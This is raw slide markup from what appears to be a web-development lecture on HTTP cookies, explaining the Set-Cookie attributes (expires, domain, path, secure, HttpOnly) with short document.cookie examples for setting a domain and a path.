                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-276" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2534" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-11" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Eras Bold ITC"/>
              <a:cs typeface="Eras Bold ITC"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52230" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6301860-BD19-6F40-BB28-CF52144EBD29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7969250" y="1041400"/>
            <a:ext cx="1101725" cy="15827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52231" name="object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C2A116B-E1C2-544A-AD9C-614552B53496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7827963" y="2741613"/>
            <a:ext cx="1385887" cy="4921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29" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5F32ECA-0F8D-054B-AFBA-2C1124D7033F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758825" y="3124200"/>
            <a:ext cx="9299575" cy="1136650"/>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altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A cookie has several attributes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="84"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set-Cookie:	value[;  expires=date][;  domain=domain]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2845"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[;  path=path][;  secure][;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>] expires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>whentobedeleted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{273F723C-3B87-C44E-97CC-FC67E2E62C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093788" y="4800600"/>
            <a:ext cx="4292600" cy="369888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="28057" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="PMingLiU"/>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="PMingLiU"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-199" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="166" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="PMingLiU"/>
              </a:rPr>
              <a:t>whe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="166" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="PMingLiU"/>
              </a:rPr>
              <a:t>re </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="166" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="PMingLiU"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="166" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="PMingLiU"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="166" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="PMingLiU"/>
              </a:rPr>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="331" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="3600" baseline="-35353" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="PMingLiU"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A871B151-AFAE-AE4E-AD19-47856AF9E3D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093788" y="5181600"/>
            <a:ext cx="7669212" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="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nSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Path (scope) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: (restrict access to  a sub-domain)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A1D3BE4-DAE1-174B-B7A2-6DC32CC8E276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="6351588"/>
            <a:ext cx="8610600" cy="1233487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>makes sure that the cookie will only be sent with requests made over an encrypted connection and an attacker won’t be able to steal cookies by sniffing. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDB0D2ED-165D-2D45-9C72-8A215C549753}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093788" y="5535613"/>
            <a:ext cx="7634287" cy="854075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>When this attribute is set, client-side scripts are </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>                      not allowed to access the cookie.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Tahoma"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F3D7E99-CE9E-3E40-A57F-226E8D05B0BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1219200"/>
            <a:ext cx="6934200" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set a cookie domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2934EB6F-EC10-904A-B96F-F03852359C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="2286000"/>
            <a:ext cx="8763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a:t>The domain can be used to specify a subdomain for your cookie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54276" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF463F1D-3BB0-D34D-B14F-68CAB3B643A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="3548063"/>
            <a:ext cx="6705600" cy="20320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1525"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie = 'name=asim; domain="mysite.com";'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54277" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1063DBDE-3D44-534D-A20C-0D79B64D23E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4419600"/>
            <a:ext cx="8534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400"/>
              <a:t>Domain specifies allowed hosts to receive the cookie. If unspecified, it defaults to the host of the current document location, excluding subdomains. If Domain is specified, then subdomains are always included.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>For example, if Domain=mozilla.org is set, then cookies are included on subdomains like developer.mozilla.org.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object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{992184D4-59F9-FC41-890A-EBFD6AFF612F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1219200"/>
            <a:ext cx="5900738" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set a cookie path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3004100-7531-1D48-B59F-0EDF6C2EFB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="2286000"/>
            <a:ext cx="8763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a:t>The path parameter specifies a document location for the cookie, so it’s assigned to a specific path, and sent to the server only if the path matches the current document location, or a parent:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE7FC8D9-8BEA-AA49-BACE-1D2087A19851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4572000"/>
            <a:ext cx="6705600" cy="192088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEEEE"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1521"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="3" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="3" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = 'name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="3" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>asim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="3" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; path="/dashboard"'</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs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43D82FA-B5FC-854F-B684-B969E806AB98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2938463" y="1244600"/>
            <a:ext cx="4183062" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-528" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-233" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-568" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A87283E-8088-A94C-A889-B9812AB313B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="627063" y="2725738"/>
            <a:ext cx="86010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744"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350"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>A secure cookie is only sent to the server with an encrypted request over the  HTTPS protocol.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D04D8248-85F7-6040-B45F-7E2D056CECB2}"/>
